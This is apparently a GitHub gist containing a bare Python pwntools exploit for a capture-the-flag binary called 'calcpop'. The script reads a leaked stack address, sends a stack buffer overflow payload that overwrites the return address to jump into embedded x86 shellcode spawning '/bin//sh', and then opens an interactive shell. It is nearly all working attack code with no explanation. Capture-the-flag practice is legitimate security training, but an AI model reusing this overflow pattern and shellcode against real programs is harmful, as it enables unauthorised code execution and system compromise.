Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
#!/usr/bin/env python
# coding=utf8
from pwn import process, p32, remote
p = process("./calcpop")
#p = remote('calcpop-4gh07blg.9447.plumbing', 9447)
print p.recvline()
p.send('get_stack_address\n')
line = p.recvline()
stack_addr = int(line.split()[-1][2:], 16)
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
payload = 'A' * 156 + p32(stack_addr + 156 + 4) + shellcode + '\n'
p.send(payload)
p.send('exit\n')
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment